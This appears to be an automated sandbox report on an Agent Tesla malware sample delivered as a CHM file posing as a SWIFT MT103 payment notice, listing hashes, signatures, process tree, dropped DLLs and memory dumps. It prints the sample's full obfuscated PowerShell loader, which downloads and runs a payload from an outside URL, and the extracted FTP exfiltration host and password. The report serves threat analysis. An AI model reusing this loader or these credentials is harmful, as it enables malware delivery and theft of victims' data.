Analysis

max time kernel: 141s
max time network: 117s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 07-12-2022 09:44

Static task: static1

Behavioral task: behavioral1
Sample: Swift0002747775 MT103 000348586.chm
Resource: win7-20221111-en

Behavioral task: behavioral2
Sample: Swift0002747775 MT103 000348586.chm
Resource: win10v2004-20220812-en
General

Target: Swift0002747775 MT103 000348586.chm
Size: 15KB
MD5: 0d9ab32a173a23705f26b33c9776a8dd
SHA1: 6b06f0fa7411ac7b01807dd526508ed37facf4e2
SHA256: 5326f9691f9a304973414ea552cf71c21bccdaaf3899661de4ad647ba16c91aa
SHA512: 8d229a5af217e53a522880becb68680a325b5474683798a4812640dba8c4933ca718b1485d99aef9b31b3790914fe1024ccb05abd4a503e88af998e36a93c9bd
SSDEEP: 192:L7aJtYxFm/3gPdpkEmg45HKGBWTY1/Qxl31:L7aJtYxFqgPjkx5HlBWk1/+31
Malware Config

Extracted: http://stpindo.co.id/ck12.txt

Extracted: agenttesla
Protocol: ftp
Host: ftp://ftp.mgcpakistan.com
Port: 21
Username: [email protected]
Password: boygirl123456
Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.

Blocklisted process makes network request (2 IoCs)
Processes:
  flow 6, pid 668, powershell.exe
  flow 7, pid 668, powershell.exe

Loads dropped DLL (2 IoCs)
Processes:
  pid 668, powershell.exe
  pid 668, powershell.exe

Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
Processes:
  Key opened \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (InstallUtil.exe)
  Key opened \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (InstallUtil.exe)
  Key opened \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (InstallUtil.exe)

Suspicious use of SetThreadContext (1 IoCs)
Processes:
  PID 668 (powershell.exe) set thread context of PID 1320 (InstallUtil.exe)

Modifies Internet Explorer settings (1 IoCs)
Processes:
  Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main (hh.exe)

Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes:
  pid 668, powershell.exe
  pid 1320, InstallUtil.exe
  pid 1320, InstallUtil.exe
  pid 1320, InstallUtil.exe

Suspicious use of AdjustPrivilegeToken (22 IoCs)
Processes:
  pid 668, powershell.exe, tokens: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  pid 1320, InstallUtil.exe, tokens: SeDebugPrivilege

Suspicious use of SetWindowsHookEx (2 IoCs)
Processes:
  pid 1552, hh.exe
  pid 1552, hh.exe

Suspicious use of WriteProcessMemory (15 IoCs)
Processes:
  PID 1552 (hh.exe) wrote to memory of PID 668 (powershell.exe), 3 entries
  PID 668 (powershell.exe) wrote to memory of PID 1320 (InstallUtil.exe), 12 entries

outlook_office_path (1 IoCs)
Processes:
  Key opened \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (InstallUtil.exe)

outlook_win_path (1 IoCs)
Processes:
  Key opened \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (InstallUtil.exe)
Processes

Level 1: C:\Windows\hh.exe (PID 1552)
  Command line: "C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\Swift0002747775 MT103 000348586.chm"
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 668, child of 1552)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'http' + '://stpindo.co.id/ck12.txt')|P
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    Level 3: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 1320, child of 668)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      - Accesses Microsoft Outlook profiles
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path
Downloads

Dropped file: \Users\Admin\AppData\Local\Temp\6fa7e56d-5a67-4728-a5db-c67fd5cf7763\AgileDotNetRT64.dll
  Filesize: 75KB
  MD5: 42b2c266e49a3acd346b91e3b0e638c0
  SHA1: 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
  SHA256: adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
  SHA512: 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

Dropped file: \Users\Admin\AppData\Local\Temp\f1c816ee-9c5b-4ee5-8939-4ab00a42e9d3\AgileDotNetRT64.dll
  Filesize: 75KB
  MD5: 42b2c266e49a3acd346b91e3b0e638c0
  SHA1: 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
  SHA256: adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
  SHA512: 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

Memory dumps (PID 668, powershell.exe):
  memory/668-55-0x0000000000000000-mapping.dmp
  memory/668-57-0x000007FEEF8E0000-0x000007FEF0303000-memory.dmp (10.1MB)
  memory/668-58-0x000007FEEE680000-0x000007FEEF1DD000-memory.dmp (11.4MB)
  memory/668-59-0x0000000002444000-0x0000000002447000-memory.dmp (12KB)
  memory/668-60-0x000000001B6F0000-0x000000001B9EF000-memory.dmp (3.0MB)
  memory/668-61-0x000000000244B000-0x000000000246A000-memory.dmp (124KB)
  memory/668-62-0x0000000002444000-0x0000000002447000-memory.dmp (12KB)
  memory/668-64-0x000007FEEF750000-0x000007FEEF8D4000-memory.dmp (1.5MB)
  memory/668-73-0x0000000002444000-0x0000000002447000-memory.dmp (12KB)
  memory/668-75-0x000000000244B000-0x000000000246A000-memory.dmp (124KB)

Memory dumps (PID 1320, InstallUtil.exe):
  memory/1320-66-0x0000000000400000-0x000000000043C000-memory.dmp (240KB)
  memory/1320-67-0x0000000000400000-0x000000000043C000-memory.dmp (240KB)
  memory/1320-69-0x0000000000400000-0x000000000043C000-memory.dmp (240KB)
  memory/1320-70-0x0000000000400000-0x000000000043C000-memory.dmp (240KB)
  memory/1320-71-0x0000000000400000-0x000000000043C000-memory.dmp (240KB)
  memory/1320-72-0x0000000000437AEE-mapping.dmp
  memory/1320-76-0x0000000000400000-0x000000000043C000-memory.dmp (240KB)
  memory/1320-78-0x0000000000400000-0x000000000043C000-memory.dmp (240KB)
  memory/1320-79-0x0000000075C81000-0x0000000075C83000-memory.dmp (8KB)

Memory dumps (PID 1552, hh.exe):
  memory/1552-54-0x000007FEFC2C1000-0x000007FEFC2C3000-memory.dmp (8KB)